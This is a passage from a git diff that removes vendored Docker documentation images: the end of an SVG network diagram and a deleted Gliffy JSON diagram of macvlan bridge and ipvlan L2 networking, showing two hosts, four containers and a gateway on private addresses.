matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="84" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="9" y="12">Network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12">Router</text></g><g transform="translate(20,28) matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="102" height="14" fill-opacity="0"/></g></g><g transform="translate(20,28) matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="14" width="82" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="11" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="31" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="34" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="54" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="58" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="64" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="74" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="78" y="26">24</text></g></g><g transform="translate(0,0) matrix(1,0,0,1,22.803646598905374,21.51999694824218)"><g><g transform="translate(0,0) scale(0.9127109745695561,0.9)"><g><g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 52.371 16.22 L -1.393 16.22 L -1.393 99.52 L 52.371 99.52" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 52.371 99.52 L 69.07 82.82 L 69.07 -0.48 L 19.98 -0.48 L -1.393 16.22 L 52.371 16.22 L 52.371 99.52 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 52.371 16.22 L 69.07 -0.48" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 25.3 16.22 L 25.3 99.52" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 26.149 16.22 L 44.316 -0.48" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 23.823 L 21.317 23.823 Q 21.317 23.823 21.317 23.823 L 21.317 34.868 Q 21.317 34.868 21.317 34.868 L 3.263 34.868 Q 3.263 34.868 3.263 34.868 L 3.263 23.823 Q 3.263 23.823 3.263 23.823 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 23.823 L 47.207 23.823 Q 47.207 23.823 47.207 23.823 L 47.207 34.868 Q 47.207 34.868 47.207 34.868 L 29.156 34.868 Q 29.156 34.868 29.156 34.868 L 29.156 23.823 Q 29.156 23.823 29.156 23.823 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 64.604 L 21.317 64.604 Q 21.317 64.604 21.317 64.604 L 21.317 75.648 Q 21.317 75.648 21.317 75.648 L 3.263 75.648 Q 3.263 75.648 3.263 75.648 L 3.263 64.604 Q 3.263 64.604 3.263 64.604 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 64.604 L 47.207 64.604 Q 47.207 64.604 47.207 64.604 L 47.207 75.648 Q 47.207 75.648 47.207 75.648 L 29.156 75.648 Q 29.156 75.648 29.156 75.648 L 29.156 64.604 Q 29.156 64.604 29.156 64.604 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 82.445 L 21.317 82.445 Q 21.317 82.445 21.317 82.445 L 21.317 93.49 Q 21.317 93.49 21.317 93.49 L 3.263 93.49 Q 3.263 93.49 3.263 93.49 L 3.263 82.445 Q 3.263 82.445 3.263 82.445 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 82.445 L 47.207 82.445 Q 47.207 82.445 47.207 82.445 L 47.207 93.49 Q 47.207 93.49 47.207 93.49 L 29.156 93.49 Q 29.156 93.49 29.156 93.49 L 29.156 82.445 Q 29.156 82.445 29.156 82.445 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,27.38636363636374,108.14285409109937)"><g><g transform="translate(0,0) scale(3.742857142857143,2.8181818181818183)"><g><g><g><path fill="#929292" stroke="rgb(0,0,0)" d="M 58.97 19.094 C 58.977 18.895 59 18.7 59 18.5 C 59 8.283 50.717 0 40.5 0 C 33.11 0 26.751 4.344 23.787 10.607 C 22.275 9.593 20.458 9 18.5 9 C 13.5 9 9.41 12.866 9.037 17.771 C 3.778 19.616 0 24.61 0 30.5 C 0 37.787 5.778 43.71 13 43.975 L 13 44 L 58 44 L 58 43.975 C 64.671 43.71 70 38.235 70 31.5 C 70 25.095 65.18 19.822 58.97 19.094 Z M 58 41.975 L 58 42 L 13 42 L 13 41.975 C 6.883 41.711 2 36.683 2 30.5 C 2 24.994 5.872 20.398 11.039 19.271 C 11.013 19.017 11 18.76 11 18.5 C 11 14.357 14.358 11 18.5 11 C 21.017 11 23.239 12.244 24.6 14.146 C 26.512 7.15 32.897 2 40.5 2 C 49.613 2 57 9.388 57 18.5 C 57 19.353 56.914 20.183 56.79 21 L 58 21 L 58 21.025 C 63.565 21.288 68 25.87 68 31.5 C 68 37.13 63.565 41.712 58 41.975 Z" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy
deleted file mode 100644
index eceec778b7..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy
+++ /dev/null
@@ -1 +0,0 @@
-{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":541,"height":352,"nodeIndex":290,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":2,"y":6.5},"max":{"x":541,"y":334.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":2.0,"y":6.5,"rotation":0.0,"id":288,"width":541.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:20px;font-weight:bold;\">Macvlan Bridge Mode &amp; Ipvlan L2 Mode</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":177.0,"rotation":0.0,"id":234,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":16.0,"y":240.0,"rotation":0.0,"id":225,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":235,"width":106.56,"height":45.0,"uid":null,"order":"auto","lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Container #1</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">eth0</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">172.16.1.10/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":138.0,"y":240.0,"rotation":0.0,"id":237,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":238,"width":106.56,"height":44.0,"uid":null,"order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container #2</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">eth0 172.16.1.11/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":40.0,"y":-26.067047119140625,"rotation":0.0,"id":258,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":7,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":237,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":50.0,"y":-16.067047119140625,"rotation":0.0,"id":259,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":8,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":225,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":60.0,"y":-6.067047119140625,"rotation":0.0,"id":260,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":9,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":241,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[75.0,180.06704711914062],[215.32345076546227,90.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":184.5,"rotation":0.0,"id":261,"width":79.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-family:Arial;\">Docker </span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\"><span style=\"font-size:14px;\">Host #1</span><span style=\"text-decoration:none;\"><br /></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":283.0,"y":177.0,"rotation":0.0,"id":276,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":291.0,"y":240.0,"rotation":0.0,"id":274,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":275,"width":106.56,"height":45.0,"uid":null,"order":14,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Container #3</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">eth0</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">172.16.1.12/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":413.0,"y":240.0,"rotation":0.0,"id":272,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":273,"width":106.56,"height":44.0,"uid":null,"order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container #4</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">eth0 <span style=\"\">172.16.1.13/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":315.0,"y":-26.067047119140625,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":18,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":325.0,"y":-16.067047119140625,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":19,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":274,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":278.0,"y":184.5,"rotation":0.0,"id":267,"width":79.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-family:Arial;\">Docker </span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\"><span style=\"font-size:14px;\">Host #2</span><span style=\"text-decoration:none;\"><br /></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.0,"y":3.932952880859375,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":21,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":270,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[340.0,170.06704711914062],[205.32345076546227,80.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.32131882292583,"y":39.0019243141968,"rotation":0.0,"id":246,"width":216.0042638850729,"height":90.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":22,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":356.0,"y":150.0,"rotation":0.0,"id":270,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":1.8620689655172418,"y":0.0,"rotation":0.0,"id":271,"width":104.27586206896557,"height":42.0,"uid":null,"order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\"><span style=\"font-style:italic;\">(Host)</span><span style=\"font-weight:bold;\"><span style=\"\"> eth0</span></span><br /></span></span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">172.16.1.253/24</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">(IP Optional)</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":81.0,"y":150.0,"rotation":0.0,"id":241,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":1.8620689655172415,"y":0.0,"rotation":0.0,"id":242,"width":104.27586206896555,"height":42.0,"uid":null,"order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\"><span style=\"\"><span style=\"font-style:italic;\">(Host)</span></span><span style=\"font-weight:bold;\"> eth0</span><br /></span></span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">172.16.1.254/24</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;font-style:italic;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">(IP Optional)</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":224.0,"y":64.19999694824219,"rotation":0.0,"id":262,"width":120.00000000000001,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;\">Network Gateway</span></p><p style=\"text-align:center;\"><span style=\"font-size:14px;\"><span style=\"\">172.16.1.1</span><span style=\"\">/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":307.5,"rotation":0.0,"id":282,"width":541.0,"height":36.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:16px;font-style:italic;\">Containers Attached Directly to Parent Interface. No Bridge Used (Docker0)</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 